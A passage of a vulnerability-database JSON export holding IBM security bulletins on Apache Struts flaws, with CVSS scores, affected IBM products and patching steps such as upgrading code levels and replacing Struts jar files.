"availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": 
"NONE"}, "impactScore": 3.6}, "published": "2018-06-18T00:10:19", "type": "ibm", "title": "Security Bulletin: A vulnerability in Struts affects the IBM FlashSystem model V9000 (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2018-06-18T00:10:19", "id": "57D5D7F551864FE98EB015D9D1AEB418275353D91DF5CC988649246B5CB1C2F5", "href": "https://www.ibm.com/support/pages/node/690787", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-09T11:26:17", "description": "## Summary\n\nAn Open Source Apache Struts vulnerability was disclosed in September 2015. Struts is used by SAN Volume Controller and Storwize Family. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. 
\nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \n \nAll products are affected when running supported releases 1.1 to 7.5 except for versions 7.4.0.8 and 7.5.0.5 and above. Version 7.6 is not affected.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.4.0.8 \n7.5.0.6 \n7.6.0.3 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller and Storwize Family (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-03-29T01:48:02", "id": "809237077FCC3D7946948EF3FA21FE3D90B0A0CB1F84CDAB9C1A81AA794E8B6C", "href": "https://www.ibm.com/support/pages/node/690947", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-13T05:38:03", "description": "## Summary\n\nApache Struts could potentially allow a remote attacker to bypass security restrictions, caused by predictable tokens. \n\n## Vulnerability Details\n\n**CVEID: **[**_CVE-2014-7809_**](<https://vulners.com/cve/CVE-2014-7809>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. 
\n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/98963_](<http://xforce.iss.net/xforce/xfdb/98963>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AC0, 9848-AC0, 9846-AC1, & 9848-AC1. The Service Assist GUI is the only component in these products that uses the Apache Struts library. \n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**V840 MTMs:** 9846-AC0, \n9846-AC1, \n9848-AC0, \n9848-AC1| _A code fix is now available, the VRMF of this code level is 7.3.0.4 (or later)_| _ __N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n**Note:** \nV840 customers must upgrade the code of both the -AE1 and -ACx (whether -AC0 or -AC1) nodes to address this vulnerability. A customer reading this to fix one model type (e.g. \u2013AC1) should look for the corresponding security bulletin which describes how to fix the other model type (e.g. perhaps \u2013AE1) in the customer's V840. 
\n\n\n[_Link to FlashSystem 840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)\n\n \n[_Link to FlashSystem V840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-18T00:09:27", "type": "ibm", "title": "Security Bulletin: The IBM FlashSystem V840 product model numbers AC0 and AC1 nodes are affected by vulnerabilities in Apache\u2019s Struts library (CVE-2014-7809)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2018-06-18T00:09:27", "id": "C07414E8C52FB3463AC172E97ABC5C7C15B6D3B1D98BDB2065BF167AE36DA8E9", "href": "https://www.ibm.com/support/pages/node/690435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T05:37:40", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability could allow a remote attacker to gain unauthorized access to the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. 
An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type and models (MTMs) for all available code levels._ MTMs affected include 9846-AE1, 9848-AE1, 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1.\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 & \n9848-AE1 \n \n**Control nodes:** 9846-AC0, \n9846-AC1, \n9848-AC0 & \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF .___ _ \n_1.4 stream: 1.4.0.10 (or later)_ \n_1.3 stream: 1.3.0.5 (or later)_ \n_1.2 stream: 1.2.1.9 (or later)_ \n \n__Controller Node VRMF .__ \n_7.6 stream: 7.6.0.4 (or later)_ \n_7.5 stream: 7.5.0.7 (or later)_ \n_7.4 stream: 7.4.0.9 (or later)_| _ __N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this vulnerability_ \n \n \n[**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-18T00:10:20", "type": "ibm", "title": "Security Bulletin:A vulnerability in Struts affects the IBM FlashSystem model V840 (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2018-06-18T00:10:20", "id": "6900D265BE47AA90C298D0D7770A85C4D26AD1BCA850041A3008AD885B0E1606", "href": "https://www.ibm.com/support/pages/node/690789", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-30T09:48:20", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and IBM FlashSystem 900 are susceptible. An exploit of this vulnerability could allow a remote attacker to gain unauthorized access to the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. 
\nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n\n## Affected Products and Versions\n\nFlashSystem 840 including machine type and models (MTMs) for all available code levels. MTMs affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 including machine type and models (MTMs) for all available code levels. MTMs affected include 9840-AE2 and 9843-AE2.\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 & \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 & \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Fixed code VRMF .__ \n_1.4 stream: 1.4.0.10 (or later)_ \n_1.3 stream: 1.3.0.5 (or later)_ \n_1.2 stream: 1.2.1.9 (or later)_| _ __N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this vulnerability_ \n \n** \n**[**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Struts affects the IBM FlashSystem models 840 and 900 (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-02-18T01:45:50", "id": "DFFF28230614331A1F13B0124F5F0C7C78FA27A1A224A596CB2E642B9DA21C5A", "href": "https://www.ibm.com/support/pages/node/690785", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T17:50:13", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \nIBM Sterling Order Management| 9.4.x \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2020-17530"], "modified": "2022-05-11T01:06:34", "id": "DE610DDFE9494156D25DDA58CDDC5C5009E3BBAAB1D9C6FC73CE6056DFE0DCFA", "href": "https://www.ibm.com/support/pages/node/6565855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:20", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for IBM Connections| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:03:35", "type": "ibm", "title": "Security Bulletin: 
CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:03:35", "id": "6AB7EE25CEFEC99E5658BEFE4D594FAAA375C1558F00A1900E6FF8619C6CA80A", "href": "https://www.ibm.com/support/pages/node/6593791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:53:10", "description": "## Summary\n\nApache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1\n\n## Remediation/Fixes\n\nSee workarounds\n\n## Workarounds and Mitigations\n\n**Platform Cluster Manager 4.2.1 & Platform HPC 4.2.1**\n\n1\\. 
Download the struts-2.3.28-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.28/_](<http://archive.apache.org/dist/struts/2.3.28/>)\n\n2\\. Copy the struts-2.3.28-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.28-lib.zip package on the management node.\n\n# unzip struts-2.3.28-lib.zip \n# cd struts-2.3.28/lib \n# cp xwork-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-jasperreports-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-json-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# cp ognl-3.0.13.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-2.3.18.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/ognl-3.0.6.jar /root/backup \n\n\n4\\. 
Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n\n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x**\n\n1\\. Download the struts-2.3.28-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.28/_](<http://archive.apache.org/dist/struts/2.3.28/>)\n\n2\\. Copy the struts-2.3.28-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.28-lib.zip package on the management node.\n\n# unzip struts-2.3.28-lib.zip \n# cd struts-2.3.28/lib \n# cp xwork-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-jasperreports-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp ognl-3.0.13.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-2.3.16.3.jar /root/backup \n# mv 
/opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-2.3.16.3.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-2.3.18.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-3.0.6.jar /root/backup \n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto \n\nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x**\n\n1\\. Download the struts-2.3.28-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.28/_](<http://archive.apache.org/dist/struts/2.3.28/>)\n\n2\\. Copy the struts-2.3.28-lib.zip package to the management node.\n\n3\\. 
